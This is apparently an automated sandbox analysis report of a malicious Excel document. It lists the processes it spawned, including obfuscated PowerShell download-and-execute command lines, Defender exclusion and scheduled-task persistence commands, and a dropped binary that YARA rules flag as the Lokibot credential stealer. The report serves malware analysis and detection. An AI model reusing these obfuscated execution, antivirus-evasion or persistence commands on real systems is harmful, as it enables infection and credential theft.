                                                                    File size:13'824 bytes
                                                                    MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:5
                                                                    Start time:01:56:36
                                                                    Start date:20/11/2024
                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'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'+[cHaR]0X22+'))')))"
                                                                    Imagebase:0x13f6f0000
                                                                    File size:443'392 bytes
                                                                    MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    Target ID:7
                                                                    Start time:01:56:38
                                                                    Start date:20/11/2024
                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment
                                                                    Imagebase:0x13f6f0000
                                                                    File size:443'392 bytes
                                                                    MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    Target ID:8
                                                                    Start time:01:56:42
                                                                    Start date:20/11/2024
                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i4ik0bio\i4ik0bio.cmdline"
                                                                    Imagebase:0x13f590000
                                                                    File size:2'758'280 bytes
                                                                    MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    Target ID:9
                                                                    Start time:01:56:43
                                                                    Start date:20/11/2024
                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES37A5.tmp" "c:\Users\user\AppData\Local\Temp\i4ik0bio\CSCA15BDDDB4364D65A645793B6780D1C5.TMP"
                                                                    Imagebase:0x13fc70000
                                                                    File size:52'744 bytes
                                                                    MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:11
                                                                    Start time:01:56:48
                                                                    Start date:20/11/2024
                                                                    Path:C:\Users\user\AppData\Roaming\caspol.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\AppData\Roaming\caspol.exe"
                                                                    Imagebase:0xec0000
                                                                    File size:600'576 bytes
                                                                    MD5 hash:74061922F1E78C237A66D12A15A18181
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000B.00000002.470705091.0000000002410000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000B.00000002.470705091.0000000002410000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.470705091.0000000002410000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 0000000B.00000002.470705091.0000000002410000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 0000000B.00000002.470705091.0000000002410000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000B.00000002.470705091.0000000002410000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000B.00000002.471306771.000000000350F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000B.00000002.471306771.000000000350F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.471306771.000000000350F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 0000000B.00000002.471306771.000000000350F000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 0000000B.00000002.471306771.000000000350F000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000B.00000002.471306771.000000000350F000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000B.00000002.471306771.0000000003529000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000B.00000002.471306771.0000000003529000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.471306771.0000000003529000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 0000000B.00000002.471306771.0000000003529000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 0000000B.00000002.471306771.0000000003529000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000B.00000002.471306771.0000000003529000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    Antivirus matches:
                                                                    • Detection: 100%, Avira
                                                                    • Detection: 100%, Joe Sandbox ML
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    Target ID:12
                                                                    Start time:01:56:49
                                                                    Start date:20/11/2024
                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\caspol.exe"
                                                                    Imagebase:0x170000
                                                                    File size:427'008 bytes
                                                                    MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:14
                                                                    Start time:01:56:49
                                                                    Start date:20/11/2024
                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
                                                                    Imagebase:0x170000
                                                                    File size:427'008 bytes
                                                                    MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:16
                                                                    Start time:01:56:49
                                                                    Start date:20/11/2024
                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\user\AppData\Local\Temp\tmpAAE0.tmp"
                                                                    Imagebase:0x620000
                                                                    File size:179'712 bytes
                                                                    MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:18
                                                                    Start time:01:56:50
                                                                    Start date:20/11/2024
                                                                    Path:C:\Users\user\AppData\Roaming\caspol.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\AppData\Roaming\caspol.exe"
                                                                    Imagebase:0xec0000
                                                                    File size:600'576 bytes
                                                                    MD5 hash:74061922F1E78C237A66D12A15A18181
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000012.00000002.637368812.0000000000874000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                    Has exited:false

                                                                    Target ID:19
                                                                    Start time:01:56:52
                                                                    Start date:20/11/2024
                                                                    Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -Embedding
                                                                    Imagebase:0x1260000
                                                                    File size:2'525'680 bytes
                                                                    MD5 hash:2F8D93826B8CBF9290BC57535C7A6817
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:20
                                                                    Start time:01:56:56
                                                                    Start date:20/11/2024
                                                                    Path:C:\Windows\System32\taskeng.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:taskeng.exe {819EB824-4817-4048-BBF5-A7A0A0C35676} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
                                                                    Imagebase:0xff6a0000
                                                                    File size:464'384 bytes
                                                                    MD5 hash:65EA57712340C09B1B0C427B4848AE05
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    Target ID:21
                                                                    Start time:01:56:56
                                                                    Start date:20/11/2024
                                                                    Path:C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe
                                                                    Imagebase:0x10f0000
                                                                    File size:600'576 bytes
                                                                    MD5 hash:74061922F1E78C237A66D12A15A18181
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000015.00000002.500711423.0000000002591000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000015.00000002.500711423.0000000002591000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000015.00000002.500711423.0000000002591000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000015.00000002.500711423.0000000002591000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000015.00000002.500711423.0000000002591000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000015.00000002.500711423.0000000002591000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    Antivirus matches:
                                                                    • Detection: 100%, Avira
                                                                    • Detection: 100%, Joe Sandbox ML
                                                                    Has exited:true

                                                                    Target ID:22
                                                                    Start time:01:57:00
                                                                    Start date:20/11/2024
                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
                                                                    Imagebase:0x40000
                                                                    File size:427'008 bytes
                                                                    MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:23
                                                                    Start time:01:57:01
                                                                    Start date:20/11/2024
                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
                                                                    Imagebase:0x40000
                                                                    File size:427'008 bytes
                                                                    MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:26
                                                                    Start time:01:57:03
                                                                    Start date:20/11/2024
                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\user\AppData\Local\Temp\tmpDCB9.tmp"
                                                                    Imagebase:0x690000
                                                                    File size:179'712 bytes
                                                                    MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:28
                                                                    Start time:01:57:04
                                                                    Start date:20/11/2024
                                                                    Path:C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
                                                                    Imagebase:0x10f0000
                                                                    File size:600'576 bytes
                                                                    MD5 hash:74061922F1E78C237A66D12A15A18181
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000001C.00000002.494317016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000001C.00000002.494317016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001C.00000002.494317016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 0000001C.00000002.494317016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 0000001C.00000002.494317016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: Loki_1, Description: Loki Payload, Source: 0000001C.00000002.494317016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                                                                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000001C.00000002.494317016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 0000001C.00000002.494317016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                    Has exited:true

                                                                    Target ID:29
                                                                    Start time:01:57:05
                                                                    Start date:20/11/2024
                                                                    Path:C:\Windows\System32\mshta.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\System32\mshta.exe -Embedding
                                                                    Imagebase:0x13fe20000
                                                                    File size:13'824 bytes
                                                                    MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:31
                                                                    Start time:01:57:11
                                                                    Start date:20/11/2024
                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'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'+[cHaR]0X22+'))')))"
                                                                    Imagebase:0x13f570000
                                                                    File size:443'392 bytes
                                                                    MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:33
                                                                    Start time:01:57:11
                                                                    Start date:20/11/2024
                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment
                                                                    Imagebase:0x13f570000
                                                                    File size:443'392 bytes
                                                                    MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:34
                                                                    Start time:01:57:14
                                                                    Start date:20/11/2024
                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zpwvvpvf\zpwvvpvf.cmdline"
                                                                    Imagebase:0x13fc20000
                                                                    File size:2'758'280 bytes
                                                                    MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:35
                                                                    Start time:01:57:14
                                                                    Start date:20/11/2024
                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB0AA.tmp" "c:\Users\user\AppData\Local\Temp\zpwvvpvf\CSC31AA5FCDA54445E088EDA110AE3BEBC4.TMP"
                                                                    Imagebase:0x13f180000
                                                                    File size:52'744 bytes
                                                                    MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:37
                                                                    Start time:01:57:18
                                                                    Start date:20/11/2024
                                                                    Path:C:\Users\user\AppData\Roaming\caspol.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\AppData\Roaming\caspol.exe"
                                                                    Imagebase:0x10e0000
                                                                    File size:600'576 bytes
                                                                    MD5 hash:74061922F1E78C237A66D12A15A18181
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000025.00000002.532965241.00000000025D3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000025.00000002.532965241.00000000025D3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000025.00000002.532965241.00000000025D3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000025.00000002.532965241.00000000025D3000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000025.00000002.532965241.00000000025D3000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000025.00000002.532965241.00000000025D3000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    Has exited:true

                                                                    Target ID:38
                                                                    Start time:01:57:18
                                                                    Start date:20/11/2024
                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\caspol.exe"
                                                                    Imagebase:0xbb0000
                                                                    File size:427'008 bytes
                                                                    MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:40
                                                                    Start time:01:57:19
                                                                    Start date:20/11/2024
                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
                                                                    Imagebase:0xbb0000
                                                                    File size:427'008 bytes
                                                                    MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:42
                                                                    Start time:01:57:19
                                                                    Start date:20/11/2024
                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\user\AppData\Local\Temp\tmp1F44.tmp"
                                                                    Imagebase:0x250000
                                                                    File size:179'712 bytes
                                                                    MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:44
                                                                    Start time:01:57:22
                                                                    Start date:20/11/2024
                                                                    Path:C:\Users\user\AppData\Roaming\caspol.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\AppData\Roaming\caspol.exe"
                                                                    Imagebase:0x10e0000
                                                                    File size:600'576 bytes
                                                                    MD5 hash:74061922F1E78C237A66D12A15A18181
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Call Graph

                                                                    Graph is empty (no call graph nodes were recorded for this sample).

                                                                    Module: Sheet1

                                                                    Declaration
                                                                    Attribute VB_Name = "Sheet1"
                                                                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                    Attribute VB_GlobalNameSpace = False
                                                                    Attribute VB_Creatable = False
                                                                    Attribute VB_PredeclaredId = True
                                                                    Attribute VB_Exposed = True
                                                                    Attribute VB_TemplateDerived = False
                                                                    Attribute VB_Customizable = True

                                                                    Module: Sheet2

                                                                    Declaration
                                                                    Attribute VB_Name = "Sheet2"
                                                                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                    Attribute VB_GlobalNameSpace = False
                                                                    Attribute VB_Creatable = False
                                                                    Attribute VB_PredeclaredId = True
                                                                    Attribute VB_Exposed = True
                                                                    Attribute VB_TemplateDerived = False
                                                                    Attribute VB_Customizable = True

                                                                    Module: Sheet3

                                                                    Declaration
                                                                    Attribute VB_Name = "Sheet3"
                                                                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                    Attribute VB_GlobalNameSpace = False
                                                                    Attribute VB_Creatable = False
                                                                    Attribute VB_PredeclaredId = True
                                                                    Attribute VB_Exposed = True
                                                                    Attribute VB_TemplateDerived = False
                                                                    Attribute VB_Customizable = True

                                                                    Module: ThisWorkbook

                                                                    Declaration
                                                                    Attribute VB_Name = "ThisWorkbook"
                                                                    Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                                                    Attribute VB_GlobalNameSpace = False
                                                                    Attribute VB_Creatable = False
                                                                    Attribute VB_PredeclaredId = True
                                                                    Attribute VB_Exposed = True
                                                                    Attribute VB_TemplateDerived = False
                                                                    Attribute VB_Customizable = True

                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000003.430492158.00000000035F0000.00000010.00000800.00020000.00000000.sdmp, Offset: 035F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_3_35f0000_mshta.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                      • Instruction ID: 8d859bd0f90cf432f5a6d8828943b7b0fa2382a58c00d2892dcb8f6fc4f96a2d
                                                                      • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                      • Instruction Fuzzy Hash:

Execution Graph

Execution Coverage: 5%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 50%
Total number of Nodes: 6
Total number of Limit Nodes: 0
execution_graph (nodes and edges):
• 7fe891a4b18 -> 7fe891a5a30 (URLDownloadToFileW) -> 7fe891a5b00
• 7fe891a59e1 -> 7fe891a59f1 (URLDownloadToFileW) -> 7fe891a5b00

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000005.00000002.475431294.000007FE891A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE891A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7fe891a0000_powershell.jbxd
Similarity
• API ID: DownloadFile
• String ID:
• API String ID: 1407266417-0
• Opcode ID: e9858a590bb1ad5908b8d94a8f69db2028c05f584d8bb7707eb6ef8eb2b065e1
• Instruction ID: 1254ffba3495300d965ee62da69c98b9a65ee41ce28f925c3bc24e8a14379329
• Opcode Fuzzy Hash: e9858a590bb1ad5908b8d94a8f69db2028c05f584d8bb7707eb6ef8eb2b065e1
• Instruction Fuzzy Hash: B6318F3191CA5C8FDB58DF5CD8857A9BBE1FBA9321F00822ED04ED3655CB70B8568B81

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000005.00000002.475431294.000007FE891A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE891A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7fe891a0000_powershell.jbxd
Similarity
• API ID: DownloadFile
• String ID:
• API String ID: 1407266417-0
• Opcode ID: 3256bafd3350b19455e4fefda42f1c6bafc7e1ea39df54a6180ba360bd490e20
• Instruction ID: c755f29a447ffd7eee11bbc952210359bd707e52e8eb64428b6e01456d9a3dd4
• Opcode Fuzzy Hash: 3256bafd3350b19455e4fefda42f1c6bafc7e1ea39df54a6180ba360bd490e20
• Instruction Fuzzy Hash: 2041133190DB889FDB19DB5898447AABFF0FB56321F04826FD08DD7162CB346846C781

Control-flow Graph

Memory Dump Source
• Source File: 00000005.00000002.475626527.000007FE89270000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89270000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7fe89270000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0d46b230baad3e9d7e278be51a8a8da29d2b2eb72adc0c7add9055ac0f3fb555
